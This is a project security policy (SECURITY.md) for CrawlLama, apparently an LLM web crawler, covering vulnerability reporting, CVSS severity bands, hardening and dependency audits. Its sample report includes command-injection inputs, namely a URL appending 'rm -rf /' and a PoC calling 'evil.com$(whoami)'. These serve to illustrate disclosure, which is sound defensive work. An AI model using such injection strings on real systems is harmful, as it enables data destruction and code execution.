# Security Policy

The security of CrawlLama is important to us. If you discover a vulnerability, please report it responsibly.

## Supported Versions

We provide security updates for the following versions:
| Version | Supported |
|---|---|
| 1.4.x | :white_check_mark: |
| 1.3.x | :x: |
| 1.2.x | :x: |
| < 1.2 | :x: |
## Reporting a Vulnerability

**Do NOT create public GitHub Issues for vulnerabilities.** This could put other users at risk.

Please report vulnerabilities responsibly. Use a subject line of the form `[SECURITY] Short Description` and provide as many details as possible.
Example:
**Vulnerability:** Command Injection in page_reader.py
**Version:** v1.3.0
**Description:**
The function `fetch_page()` in `tools/page_reader.py` does not properly validate user input, which can lead to command injection.
**Steps:**
1. Start CrawlLama
2. Enter the following URL: `http://example.com; rm -rf /`
3. Command is executed on the system
**Impact:**
Remote Code Execution (RCE) as the user running CrawlLama
**PoC:**
```python
from tools.page_reader import fetch_page
fetch_page("http://evil.com$(whoami)")
```

**Suggestion:**
URL validation with `validators.url()` before processing
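As a rough illustration of the suggested pre-validation, here is a standard-library sketch (the `validators.url()` helper mentioned above serves the same purpose; the names below are illustrative, not CrawlLama's actual API):

```python
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}
# Characters that commonly enable shell injection when a URL is
# interpolated into a command line.
SHELL_METACHARS = set(";|&$`<>")

def is_safe_url(url: str) -> bool:
    """Reject URLs containing shell metacharacters or using
    unsupported schemes, before any fetch is attempted."""
    if any(ch in SHELL_METACHARS for ch in url):
        return False
    parsed = urlparse(url)
    return parsed.scheme in ALLOWED_SCHEMES and bool(parsed.netloc)
```

With this check in place, both PoC inputs above (`;` and `$(...)`) are rejected before any subprocess is involved. The more robust fix is to avoid passing URLs through a shell at all.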
## Response Times

We strive for the following response times:

## Severity Classification

We use the CVSS v3.1 scoring system:
| Severity | CVSS Score | Examples |
|---|---|---|
| Critical | 9.0-10.0 | RCE, Authentication Bypass |
| High | 7.0-8.9 | SQL Injection, XSS |
| Medium | 4.0-6.9 | CSRF, Information Disclosure |
| Low | 0.1-3.9 | Minor Information Leaks |
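The bands in the table can be mapped programmatically, which is handy in triage scripts. A small helper sketch (not part of CrawlLama itself):

```python
def cvss_severity(score: float) -> str:
    """Map a CVSS v3.1 base score to the severity bands above."""
    if not 0.0 <= score <= 10.0:
        raise ValueError("CVSS base scores range from 0.0 to 10.0")
    if score >= 9.0:
        return "Critical"
    if score >= 7.0:
        return "High"
    if score >= 4.0:
        return "Medium"
    if score > 0.0:
        return "Low"
    return "None"  # CVSS v3.1 defines 0.0 as severity "None"
```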
## Deployment Security

CrawlLama is designed for local operation. If you expose it publicly (e.g. via FastAPI), apply additional hardening.

⚠️ **Important Security Measures:**

- Rate limiting (`security.rate_limit`)
- Domain blacklist (`data/blacklist.txt`)
- Hallucination detection (`core/hallu_detect.py`)

## Dependency Security

We monitor dependencies regularly:
```bash
# Check dependencies
pip-audit
safety check

# Or with our script
python scripts/check_dependencies.py
```
Automatic updates: Dependabot is enabled and creates PRs for security updates.
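A wrapper script like `scripts/check_dependencies.py` typically just parses the tool's machine-readable output. A sketch of that parsing step, assuming the `"dependencies"`/`"vulns"` layout that `pip-audit --format json` produces (verify against your installed pip-audit version):

```python
import json

def vulnerable_packages(report_json: str) -> list[str]:
    """Return names of packages with at least one known vulnerability
    from a pip-audit JSON report string."""
    report = json.loads(report_json)
    return [
        dep["name"]
        for dep in report.get("dependencies", [])
        if dep.get("vulns")  # non-empty vulnerability list
    ]
```

A release gate can then simply fail when this list is non-empty.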
## Built-in Security Features

CrawlLama has the following built-in security features:
```python
# utils/validators.py
validate_url()      # Check URL format
validate_query()    # Check query length/content
sanitize_output()   # Clean LLM output
```
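The actual implementation of these helpers lives in `utils/validators.py`; as an illustration only, output sanitization for terminal display might look like this (not CrawlLama's real code):

```python
import re

# ANSI CSI escape sequences, e.g. "\x1b[31m" (red)
ANSI_CSI = re.compile(r"\x1b\[[0-9;]*[A-Za-z]")

def sanitize_output(text: str) -> str:
    """Strip ANSI escape sequences and non-printable control
    characters from model output before showing it to the user."""
    text = ANSI_CSI.sub("", text)
    return "".join(ch for ch in text if ch.isprintable() or ch in "\n\t")
```

This prevents a manipulated page or model response from injecting terminal escape sequences into the console.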
```json
# config.json
"security": {
  "rate_limit": 1.0,  # Requests per second
  "check_robots_txt": true
}
```
```text
# data/blacklist.txt
# Blocks known malicious domains
malware-site.com
phishing-domain.net
```
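Consuming such a file is straightforward; a sketch of the lookup (illustrative names, not CrawlLama's actual functions), which also blocks subdomains of listed hosts:

```python
from urllib.parse import urlparse

def load_blacklist(lines) -> set:
    """Parse blacklist lines, skipping comments and blanks."""
    return {
        ln.strip().lower()
        for ln in lines
        if ln.strip() and not ln.lstrip().startswith("#")
    }

def is_blocked(url: str, blacklist: set) -> bool:
    host = (urlparse(url).hostname or "").lower()
    # Match the domain itself and any of its subdomains.
    return any(host == d or host.endswith("." + d) for d in blacklist)
```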
```python
# API keys are stored encrypted
from utils.secure_config import SecureConfig

config = SecureConfig()
config.set_key("api_key", "secret")  # Encrypted
```
- Plugins run in a separate namespace
- No access to sensitive data
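The namespace separation can be illustrated as follows. Note this is a sketch only: an empty `__builtins__` restricts what plugin code can reach, but CPython cannot fully sandbox untrusted code this way, so plugins should still come from trusted sources.

```python
def run_plugin(source: str, api: dict) -> dict:
    """Execute plugin code with an empty __builtins__ so it only
    sees what is explicitly passed in `api`. Illustrative, not a
    real sandbox."""
    scope = {"__builtins__": {}, **api}
    exec(source, scope)  # plugin sees only the provided API
    return scope
```

A plugin given only `{"add": ...}` cannot reach `open`, `os`, or other builtins by name.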
## Security Best Practices

- Use `.env` for API keys
- Review `logs/app.log` regularly
- Use `validators.py` for all inputs
- Never commit `.env`
- Run `pip-audit` before every release

## Release Checklist

- `pip-audit` shows no critical/high vulnerabilities
- `.env.example` contains only placeholders

After fixing a vulnerability:
## Acknowledgments

We thank the following security researchers for responsible disclosure:
No reports yet - be the first!
## Bug Bounty

Currently, we have no official bug bounty program. However, we honor all security reports with:
Thank you for helping keep CrawlLama secure! 🔒